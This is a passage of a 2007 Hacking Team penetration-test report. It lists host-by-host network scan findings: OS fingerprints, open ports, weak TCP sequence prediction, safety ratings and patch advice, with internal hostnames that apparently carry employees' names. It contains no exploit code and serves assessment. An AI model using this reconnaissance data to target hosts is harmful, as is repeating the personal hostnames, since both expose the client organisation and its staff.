The host was alive and these additional information could be extracted:
80/tcp open http?
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp closed ms-term-serv
9535/tcp open man?
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 273 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Service Info: OS: Windows
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
6.12.8 100.100.200.113 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates, especially TCP/IP stack related ones
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP
Hostname ASANTANGELO
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1043/tcp open boinc-client?
9535/tcp open man?
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
6.12.9 100.100.200.116 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4
Risk state: Medium© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 274 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates, especially TCP/IP stack related ones
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows,
Compaq/HP
Version XP SP2/2003 Server
Hostname BVTESTPC
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
6.12.10 100.100.200.131 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates, especially TCP/IP stack related ones
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Not detected Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 275 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
The host was alive and these additional information could be extracted:
80/tcp open http?
443/tcp open https?
1043/tcp open boinc-client?
3389/tcp closed ms-term-serv
9535/tcp open man?
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
6.12.11 100.100.200.38 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000
Hostname GBORDIN
Compromi
sed
No Info None
Auth Not detected
The host was alive only on Initial scan, than it was no more accessible.
6.12.12 100.100.200.62 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 276 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000 SP4
Hostname PC-DEMO B2CTEST
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.13 100.100.200.63 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, Hidden on Second scan
Availability Not detected
Class Not detected
Vendor/OS Not detected Version Not detected
Hostname Not detected
Compromi
sed
No Info None
Auth Not detected
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 277 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
There could be a alive host on this ip in a hidden status.
6.12.14 100.100.200.64 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000 SP4
Hostname BVHELPDESK
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.15 100.100.200.69 [Safe]
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000
Hostname MVILLA MVILLA$
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 278 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.16 100.100.200.71 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Linux Version Ubuntu
Hostname Not detected
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
22/tcp open ssh OpenSSH 4.3p2 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MTSGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MTSGROUP)
8009/tcp open ajp13?
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 279 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Uptime: 11.660 days (since Mon Jul 2 17:45:34 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=196 (Good luck!)
IPID Sequence Generation: All zeros
Service Info: OS: Linux
6.12.17 100.100.200.76 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname PCAMBIERI
Compromi
sed
No Info None
Auth Not detected
The host was alive but no additional information could be extracted.
6.12.18 100.100.200.81 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP
Hostname BLOOMBERG-MIL
Compromise No Info None
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 280 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
d
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.19 100.100.200.83 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname PBIZZOCA
Compromised No Info None
Auth Not detected
The host was alive but no additional information could be extracted.
6.12.20 100.100.200.86 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 281 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname MNOVIK
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.21 100.100.200.87 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Embedded
Vendor/OS Linux, OpenWRT Version WhiteRussian RC5
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 282 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
22/tcp open ssh Dropbear sshd 0.48 (protocol 2.0)
80/tcp open http OpenWrt BusyBox httpd
Uptime: 0.394 days (since Sat Jul 14 00:13:08 2007)
Network Distance: 0 hops
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IPID Sequence Generation: All zeros
Service Info: Device: WAP
6.12.22 100.100.200.88 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000
Hostname PRICEFEED PRICEFEED$
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 283 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.12.23 100.100.200.90 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname FCAMPANELLA
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IPID Sequence Generation: Busy server or unknown class
Service Info: OS: Windows
6.12.24 100.100.200.98 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000
Hostname GBORDIN© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 284 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.25 100.100.200.99 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname GMANZULLO
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1043/tcp open boinc-client?
9535/tcp open man?
Network Distance: 1 hop© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 285 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.26 100.100.200.104 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.27 100.100.200.106 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 286 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Embedded
Vendor/OS Not detected Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive but no additional information could be extracted.
All 1697 scanned ports on 100.100.200.106 are filtered
OS details: 2wire wireless broadband router version 3.5.55, Cisco DOCSIS cable
modem termination server running IOS 12.1, Cisco Catalyst 6509 $
OS Fingerprint:
OS:SCAN(V=4.20%D=7/16%OT=%CT=%CU=%PV=N%G=N%TM=469B792E%P=i686-pc-linux-gnu)
OS:U1(R=N)IE(R=N)
6.12.28 100.100.200.114 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstatio
n
Vendor/OS Microsoft Windows Version Windows XP
Hostname NEWLPBLOOM
Compromised No Info None
Auth Not detected
The host was alive but no additional information could be extracted.
6.12.29 100.100.200.117 [Safe]
Rating: safe© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 287 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Not detected Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive but no additional information could be extracted:
All 1697 scanned ports on 100.100.200.117 are filtered
OS details: 2wire wireless broadband router version 3.5.55, Cisco DOCSIS cable
modem termination server running IOS 12.1, Cisco Catalyst 6509$
OS Fingerprint:
OS:SCAN(V=4.20%D=7/14%OT=%CT=%CU=%PV=N%G=N%TM=46988163%P=i686-pc-linux-gnu)
OS:U1(R=N)IE(R=N)
On this IP there is an alive host in hidden mode.
6.12.30 100.100.200.126 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows, Toshiba Version Not detected
Hostname FCAZZULINI
Compromised No Info None
Auth Not detected
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 288 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
The host was alive and these additional information could be extracted:
80/tcp open http?
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1068/tcp open instl_bootc?
1390/tcp open iclpv-sc?
2401/tcp open cvspserver CVSNT cvs pserver
3306/tcp open mysql MySQL 4.1.11-max
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.31 100.100.200.132 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows, Toshiba Version Not detected
Hostname LPELIZZOLA-LAP
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 289 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
796/tcp open unknown
3389/tcp open microsoft-rdp Microsoft Terminal Service
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.32 100.100.200.134 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 290 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.12.33 100.100.200.136 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open microsoft-rdp Microsoft Terminal Service
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.34 100.100.200.149 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows, Toshiba Version Not detected© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 291 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Hostname GALESSANDRO-LAP
Compromised No Info None
Auth Not detected
The host was alive but no additional information could be extracted.
6.12.35 100.100.200.151 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows, hp Version Not detected
Hostname ITRSALUTARI00 AD ARTEMA
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open microsoft-rdp Microsoft Terminal Service
8081/tcp open tcpwrapped
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.36 100.100.200.152 [Safe]
Rating: safe
Vulnerabilities found: n/a© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 292 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.37 100.100.200.153 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows, Toshiba Version Not detected
Hostname RLOMBARDI-LAP
Compromised No Info None
Auth Not detected
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 293 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
The host was alive but no additional information could be extracted.
6.12.38 100.100.200.154 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname XXX
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1043/tcp open mstask Microsoft mstask (task server –
c:\winnt\system32\Mstask.exe)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.39 100.100.200.155 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 294 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.40 100.100.200.157 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows, Compaq/HP Version Not detected
Hostname MRICCIARDI
Compromised No Info None
Auth Not detected
The host was alive but no additional information could be extracted.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 295 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.12.41 100.100.200.158 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows, Toshiba Version Not detected
Hostname HMAATUGH-LAP
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
80/tcp open http?
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1043/tcp open boinc-client?
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12.42 100.100.200.159 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 296 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Class Workstation
Vendor/OS Microsoft Windows, HP Version Not detected
Hostname ITLBARBIERI00 AD ARTEMA
Compromised No Info None
Auth Not detected
The host was alive but no additional information could be extracted.
6.12.43 100.100.200.180 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
